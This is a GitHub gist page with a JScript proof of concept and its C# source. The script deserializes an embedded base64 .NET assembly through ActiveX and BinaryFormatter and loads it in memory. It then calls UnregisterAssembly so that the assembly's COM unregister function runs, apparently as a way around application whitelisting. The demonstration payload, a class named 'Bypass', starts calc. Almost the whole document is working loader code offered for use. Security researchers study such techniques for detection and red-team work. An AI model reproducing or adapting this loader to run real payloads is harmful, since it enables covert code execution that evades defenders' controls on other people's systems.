-
-
Save bohops/7d043784a5e8a699c868d91975e066c7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[JS File] | |
function setversion() { | |
} | |
function debug(s) {} | |
function base64ToStream(b) { | |
var enc = new ActiveXObject("System.Text.ASCIIEncoding"); | |
var length = enc.GetByteCount_2(b); | |
var ba = enc.GetBytes_4(b); | |
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); | |
ba = transform.TransformFinalBlock(ba, 0, length); | |
var ms = new ActiveXObject("System.IO.MemoryStream"); | |
ms.Write(ba, 0, (length / 4) * 3); | |
ms.Position = 0; | |
return ms; | |
} | |
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ | |
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ | |
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ | |
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ | |
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ | |
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ | |
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ | |
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ | |
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ | |
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ | |
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ | |
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ | |
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ | |
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ | |
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ | |
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ | |
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ | |
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ | |
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ | |
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ | |
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ | |
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAA4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ | |
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMApkgzXgAAAAAA"+ | |
"AAAA4AACIQsBCwAABgAAAAYAAAAAAAA+JQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ | |
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA6CQA"+ | |
"AFMAAAAAQAAAmAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ | |
"AAAALnRleHQAAABEBQAAACAAAAAGAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAmAIAAABA"+ | |
"AAAABAAAAAgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAMAAAAAAAAAAAA"+ | |
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAACAlAAAAAAAASAAAAAIABQCQIAAAWAQAAAEAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVgIoBAAACgAA"+ | |
"cgEAAHAoBQAACgAAKjYAcjEAAHAoBQAACgAqNgByZwAAcCgFAAAKACo2AHKtAABwKAgAAAomKkJT"+ | |
"SkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAGQBAAAjfgAA0AEAAGgBAAAjU3RyaW5n"+ | |
"cwAAAAA4AwAAuAAAACNVUwDwAwAAEAAAACNHVUlEAAAAAAQAAFgAAAAjQmxvYgAAAAAAAAACAAAB"+ | |
"RxUAAAkAAAAA+iUzABYAAAEAAAAIAAAAAgAAAAQAAAACAAAACAAAAAUAAAABAAAAAgAAAAAACgAB"+ | |
"AAAAAAAGACsAJAAGAH8AXwAGAJ8AXwAGAOIAwwAGAPYAJAAGAAgBwwAGACUBwwAKAFcBRAEAAAAA"+ | |
"AQAAAAAAAQABAAEAEAAUAAAABQABAAEAUCAAAAAAhhgyAAoAAQBmIAAAAACWADgADgABAHQgAAAA"+ | |
"AJYARgAOAAIAgiAAAAAAhgBWAAoAAwAAAAEAWwAAAAEAWwARADIAEwAZADIACgAhADIAGAAJADIA"+ | |
"CgApAP4ADgAxADIACgA5ADIACgBBAF8BKAAuAAsALgAuABMANwBAADMAIwBDABsAHQBgADsAIwAE"+ | |
"gAAAAAAAAAAAAAAAAAAAAAC9AAAABAAAAAAAAAAAAAAAAQAbAAAAAAAEAAAAAAAAAAAAAAABACQA"+ | |
"AAAAAAAAADxNb2R1bGU+AHJlZ21lLmRsbABCeXBhc3MAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAu"+ | |
"Y3RvcgBSZWdpc3RlckNsYXNzAFVuUmVnaXN0ZXJDbGFzcwBFeGVjAGtleQBTeXN0ZW0uUnVudGlt"+ | |
"ZS5Db21waWxlclNlcnZpY2VzAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGlt"+ | |
"ZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcmVnbWUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZp"+ | |
"Y2VzAENvbVZpc2libGVBdHRyaWJ1dGUAQ29uc29sZQBXcml0ZUxpbmUAQ29tUmVnaXN0ZXJGdW5j"+ | |
"dGlvbkF0dHJpYnV0ZQBDb21VbnJlZ2lzdGVyRnVuY3Rpb25BdHRyaWJ1dGUAU3lzdGVtLkRpYWdu"+ | |
"b3N0aWNzAFByb2Nlc3MAU3RhcnQAAAAAAC9JACAAYQBtACAAYQAgAGIAYQBzAGkAYwAgAEMATwBN"+ | |
"ACAATwBiAGoAZQBjAHQAADVJACAAcwBoAG8AdQBsAGQAbgAnAHQAIAByAGUAYQBsAGwAeQAgAGUA"+ | |
"eABlAGMAdQB0AGUAAUVJACAAcwBoAG8AdQBsAGQAbgAnAHQAIAByAGUAYQBsAGwAeQAgAGUAeABl"+ | |
"AGMAdQB0AGUAIABlAGkAdABoAGUAcgAuAAEJYwBhAGwAYwAAAPe/XrkV9ipGnS6Wlwdbnw0ACLd6"+ | |
"XFYZNOCJAyAAAQQAAQEOBCABAQgEIAEBAgUBAAEAAAQBAAAABQABEiEOCAEACAAAAAAAHgEAAQBU"+ | |
"AhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQAAECUAAAAAAAAAAAAALiUAAAAgAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAACAlAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/"+ | |
"JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAA"+ | |
"AAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAA8AgAAAAAAAAAAAAA8AjQA"+ | |
"AABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAA"+ | |
"AAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYA"+ | |
"bwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAEAAAEAUwB0AHIAaQBu"+ | |
"AGcARgBpAGwAZQBJAG4AZgBvAAAAeAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwA"+ | |
"ZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBv"+ | |
"AG4AAAAAADAALgAwAC4AMAAuADAAAAA0AAoAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHIA"+ | |
"ZQBnAG0AZQAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAA"+ | |
"ADwACgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAByAGUAZwBtAGUALgBkAGwA"+ | |
"bAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAA4"+ | |
"AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAEA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5S"+ | |
"ZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"; | |
var entry_class = 'Bypass'; | |
setversion(); | |
var stm = base64ToStream(serialized_obj); | |
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); | |
var al = new ActiveXObject('System.Collections.ArrayList'); | |
var d = fmt.Deserialize_2(stm); | |
al.Add(undefined); | |
var rgsvcs = new ActiveXObject("System.Runtime.InteropServices.RegistrationServices"); | |
var assembly = d.DynamicInvoke(al.ToArray()); | |
var res = rgsvcs.UnregisterAssembly(assembly); | |
WScript.StdOut.WriteLine(res); | |
[CS Class Example] | |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
[ComVisible(true)] | |
public class Bypass | |
{ | |
public Bypass() { Console.WriteLine("I am a basic COM Object"); } | |
[ComRegisterFunction] //This executes if registration is successful | |
public static void RegisterClass(string key) | |
{ | |
Console.WriteLine("I shouldn't really execute"); | |
} | |
[ComUnregisterFunction] //This executes if registration fails | |
public static void UnRegisterClass(string key) | |
{ | |
Console.WriteLine("I shouldn't really execute either."); | |
} | |
public void Exec() { System.Diagnostics.Process.Start("calc"); } | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment